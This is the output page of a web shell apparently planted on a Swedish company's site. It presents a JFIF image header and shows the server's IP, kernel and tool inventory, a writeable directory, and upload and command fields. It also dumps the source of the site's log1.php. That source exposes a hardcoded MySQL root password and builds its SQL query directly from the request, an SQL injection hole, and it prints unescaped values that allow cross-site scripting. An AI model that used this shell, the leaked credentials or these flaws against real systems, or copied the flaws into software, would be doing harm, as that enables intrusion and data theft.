????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.21
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.driftinfo-online.se/site/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www.driftinfo-online.se/site/log1.php
<?php

session_start();
$companyid = $_SESSION['DRIFT_SSO_INFO'][1];
$username = $_SESSION['DRIFT_SSO_INFO'][3];

if( (($_SESSION['DRIFT_SSO_INFO'])=='' )){
			header('location: http://www.driftinfo-online.se/site');
	}

?>


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta name="viewport" user-scalable=no; initial-scale=1.0; maximum-scale=1.0; width=device-width;" />
<meta name="apple-mobile-web-app-capable" content="yes" />
<meta name="apple-mobile-web-app-status-bar-style" content="black" />
<meta name="viewport" content="user-scalable=0" />

<title>Tekniskaverken</title>
<style type="text/css">

.text {
	font-size: 10px;
	font-family: Arial, Helvetica, sans-serif;
	font-weight: bold;
}
.rubrik {
	font-size: 16px;
	font-family: Arial, Helvetica, sans-serif;

}
.rubrik1 {
	font-size: 18px;
	text-align: center;
	font-family: Arial, Helvetica, sans-serif;
	font-weight: bold;
}
.text1 {
	font-size: 12px;
	font-family: Arial, Helvetica, sans-serif;
	font-weight: bold;
}
.text2 {	font-size: 12px;
	font-family: Arial, Helvetica, sans-serif;
	font-weight: bold;
}
.ho {
	text-align: right;
}
</style>

<?php
if($_GET['info'] == "klart"){
	echo("<script>alert('Ditt meddelande har uppdaterats.');</script>");
}

?>
</head>

<body topmargin="0" marginheight="0" marginwidth="0" leftmargin="0" bgcolor="#EEEEEE">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="30" background="images/ls.jpg"><img src="images/ltc.jpg" width="30" height="36" /></td>
    <td width="*"  background="images/ts.jpg" bgcolor="#FFFFFF">&nbsp;</td>
    <td width="*"  background="images/ts.jpg" bgcolor="#FFFFFF">&nbsp;</td>
    <td width="30" background="images/rc.jpg"><img src="images/rtc.jpg" width="30" height="36" /></td>
  </tr>
  <tr>
    <td background="images/ls.jpg">&nbsp;</td>
    <td align="center" bgcolor="#FFFFFF">&nbsp;</td>
    <td align="center" bgcolor="#FFFFFF"><p><img src="<?php echo($_SESSION['DRIFT_SSO_INFO'][4]);?>" alt="" /><br />
    </p>
      <table width="250" border="0" cellspacing="0" cellpadding="0">
      <tr>
            <td><span class="rubrik1"><center>
                  L&auml;gg till h&auml;ndelse i loggen:<br />
                  <br />
                  <table width="250" border="0" cellspacing="0" cellpadding="0">
                    <tr>                    </tr>
                  </table>
            </center></span>
              <center>
                <form id="form1" method="post" action="saveLog.php">
                  <table width="250" border="0" cellspacing="0" cellpadding="0">
                    <tr>
                      <td width="80" valign="middle" class="text1">Anv&auml;ndare:</td>
                      <td width="170" class="ho"><label for="username"></label>
                        <input name="username" type="text" class="rubrik" id="username" value="<?php echo($username);?>" readonly="readonly" /></td>
                    </tr>
                    <tr>
                      <td valign="middle" class="text1">Datum:</td>
                      <td class="ho"><input name="datum" type="text" class="rubrik" id="datum" value="<?php echo(date("Y-m-d H:i:s"));?>" readonly="readonly" /></td>
                    </tr>
                    <tr>
                      <td valign="middle" class="text1">Logg:
                      <input name="dataid" type="hidden" id="dataid" value="<?php echo($_GET['id']);?>" /></td>
                      <td class="ho"><input name="logg" type="text" class="rubrik" id="logg" /></td>
                    </tr>
                  </table>
                  <br />
                  <input type="submit" name="button" id="button"  style="height: 40px; width: 250px" value="L&auml;gg till!" />
                </form>
              </center>
              <span class="rubrik1">
              <center>
                <table width="250" border="0" cellspacing="0" cellpadding="0">
                  <tr> </tr>
                </table>
              </center>
              </span><br />
          <span class="text1">Historik:</span><br />
          <?php 
		  
		  
		  $link = mysql_connect ("localhost", "root", "root123");
					mysql_select_db ("driftinfo");
					
					$sql = "SELECT * FROM tblLog where dataid = ".$_GET['id']."  order by datum desc";
		
				
				   $result = mysql_query($sql);
				   while ($row = mysql_fetch_assoc($result)){ 
						$datum = $row['datum'];
						 $logg = $row['logg'];
						 $username = $row['username'];
						
						
						
	 		
					
		  ?>
          <br />
          <table width="250" border="0" cellspacing="0" cellpadding="0">
            <tr>
              <td width="85"><span class="text">Anv&auml;ndare:</span></td>
              <td width="165" class="text"><?php echo($username);?></td>
            </tr>
            <tr>
              <td><span class="text">Datum:</span></td>
              <td class="text"><?php echo($datum);?></td>
            </tr>
            <tr>
              <td><span class="text">Logg:</span></td>
              <td class="text"><?php echo($logg);?></td>
            </tr>
          </table>
          <br />
          <hr />
          <?php }?>
<br />
          <br /><br /></td>
          </tr>
        </table>
      <p class="text"><span class="text2"><a href="log.php"><img src="images/back.png" alt="" width="170" height="32" border="0" /></a><br />
  Powered by Astacus AB</span> <br />
  <span class="text2"><a href="start.php">F&ouml;rsta sidan</a> | <a href="index.php">Logga ut </a></span></p></td>
    <td background="images/rc.jpg">&nbsp;</td>
  </tr>
  <tr>
    <td><img src="images/lbc.jpg" width="30" height="38" /></td>
    <td background="images/bs.jpg" bgcolor="#eeeeee">&nbsp;</td>
    <td background="images/bs.jpg" bgcolor="#eeeeee">&nbsp;</td>
    <td><img src="images/rbc.jpg" width="30" height="38" /></td>
  </tr>
</table>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit